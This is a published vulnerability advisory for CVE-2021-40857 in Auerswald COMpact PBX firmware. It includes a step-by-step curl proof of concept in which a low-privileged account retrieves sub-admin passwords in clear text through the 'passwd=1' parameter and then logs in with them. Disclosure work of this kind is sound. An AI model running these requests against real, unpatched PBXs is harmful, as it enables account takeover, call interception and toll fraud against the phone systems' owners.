Advisory: Auerswald COMpact Privilege Escalation RedTeam Pentesting discovered a vulnerability in the web-based management interface of the Auerswald COMpact 5500R PBX which allows low-privileged users to access passwords of administrative user accounts. Details ======= Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19") Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)) Fixed Versions: 8.2B Vulnerability Type: Privilege Escalation Security Risk: high Vendor URL: https://www.auerswald.de/en/product/compact-5500r Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005 Advisory Status: published CVE: CVE-2021-40857 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857 Introduction ============ "Fully modular VoIP appliance for more efficient communication processes With the COMpact 5500R, you are originally equipped for everyday business - now and in the future. The fully modular architecture with 80 IP channels and all the functions of a large ITC server allows up to 112 subscribers and thus scales with your company. Continuous maintanance and expansion of the system software makes this versatile IP server a future-proof investment in any business communication." (from the vendor's homepage) More Details ============ Attackers with low-privileged user accounts, for example those that are used by VoIP phones, can log into the web-based management interface of the COMpact 5500R PBX. Afterwards, the list of user accounts can be listed and details shown for each user account. Adding the URL parameter "passwd=1" then also includes the clear text password for each user account, including administrative ones, which can then be used to authenticate against the management interface. Proof of Concept ================ The command-line HTTP client curl[1] can be used as follows to log in with the username "123" and the password "secret" (shortened and formatted to increase readability): ------------------------------------------------------------------------ $ curl --anyauth --user 123:secret --include https://192.168.1.2/tree HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/ [...] [ { "login": 1, "userId": 1234, "userRufNr": "123", "userName": "123", "pbxType": 35, "pbxId": 0, "pbx": "COMpact 5500R", "pbxEdit": "Comp.5500R", "isActivated": 1, "dongleTnCount": 112, "currentConfig": 34, "cur": "EUR", "language": 0, "hidePrivat": 1, "offlineConfig": false }, [...] ] ------------------------------------------------------------------------ The server returns a JSON document describing the user account as well as a session ID in a cookie. This session ID can then be used to access other API endpoints on the PBX. The following listing shows the request to the path "/logstatus_state", which returns the current access level: ------------------------------------------------------------------------ $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ https://192.168.1.2/logstatus_state HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"logstatus":"Teilnehmer"} ------------------------------------------------------------------------ The access level in this case is "Teilnehmer" (member). The list of all other users can be requested as follows: ------------------------------------------------------------------------ $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ https://192.168.1.2/cfg_data_teilnehmer HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] [ [...] {"id":1234,"nr":"123","name":"Example User","isSubAdmin":false}, [...] {"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true} [...] ] ------------------------------------------------------------------------ Two user accounts are shown in the listing above: the current user's account with the ID 1234 and a different user account with so-called "sub-admin" privileges with the ID 2222. Details about a particular user account with a given ID can be requested like this: ------------------------------------------------------------------------ $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"rufnr":"123","name":"Example User",[...], "privatPin":"XXXXXX","privatPass":"XXXXXXXXXX","privatToken":"XXXXXXXXXX", [...], "isSubadmin":0,[...]} ------------------------------------------------------------------------ In the returned JSON document, the values of the fields for the PIN, token and password are replaced by "XXX". But if the URL parameter "passwd" is set to the value 1, the values are returned in plain text: ------------------------------------------------------------------------ $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"rufnr":"123","name":"Example User",[...], "privatPin":"12345678","privatPass":"secretpassword", "privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]} ------------------------------------------------------------------------ This can be repeated for other user accounts, for example for the user account with the ID 2222 shown it the listing earlier. The server returns the plain text password for the other user account: ------------------------------------------------------------------------ $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1 HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"rufnr":"555","name":"sub-admin other user","privatPin":"99999999", "privatPass":"verysecretpassword","privatToken":"zzzzzzzzzz", [...],"isSubadmin":1,[...]} ------------------------------------------------------------------------ The password can then be used to log into the PBX with the other user account: ------------------------------------------------------------------------ $ curl --anyauth --user sub-admin:verysecretpassword --include \ https://192.168.1.2/tree [...] HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/ [...] [{"login":2,"userId":2222,[...]}] ------------------------------------------------------------------------ Checking the access level with the new session ID shows that the user is now logged in with an administrative account: ------------------------------------------------------------------------ $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ https://192.168.1.2/logstatus_state HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"logstatus":"Sub-Administrator"}% ------------------------------------------------------------------------ Workaround ========== Disable or restrict access to the web-based management interface if possible. Fix === Upgrade to a firmware version which corrects this vulnerability. Security Risk ============= Attackers who have acquired access to a low-privileged user account, for example by extracting such an account from a VoIP phone, can log into the web-based management interface of the COMpact 5500R PBX and access clear text passwords for other user accounts, including those with the "sub-admin" privilege. After logging in with these newly acquired credentials, attackers can access configuration settings and most other functions. They can then for example create new SIP credentials and use them to call premium rate phone lines they operate to generate revenue. They can monitor and even redirect all incoming and outgoing phone calls and record all Ethernet data traffic. Due to the severe and far-reaching consequences and despite the prerequisite of having to know an existing low-privilege user account, this vulnerability rated as a high risk. Timeline ======== 2021-08-26 Vulnerability identified 2021-09-01 Customer approved disclosure to vendor 2021-09-10 Vendor notified 2021-09-10 CVE ID requested 2021-09-10 CVE ID assigned 2021-10-05 Vendor provides access to device with fixed firmware 2021-10-11 Vendor provides fixed firmware 2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected 2021-12-06 Advisory published References ========== [1] https://curl.se/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/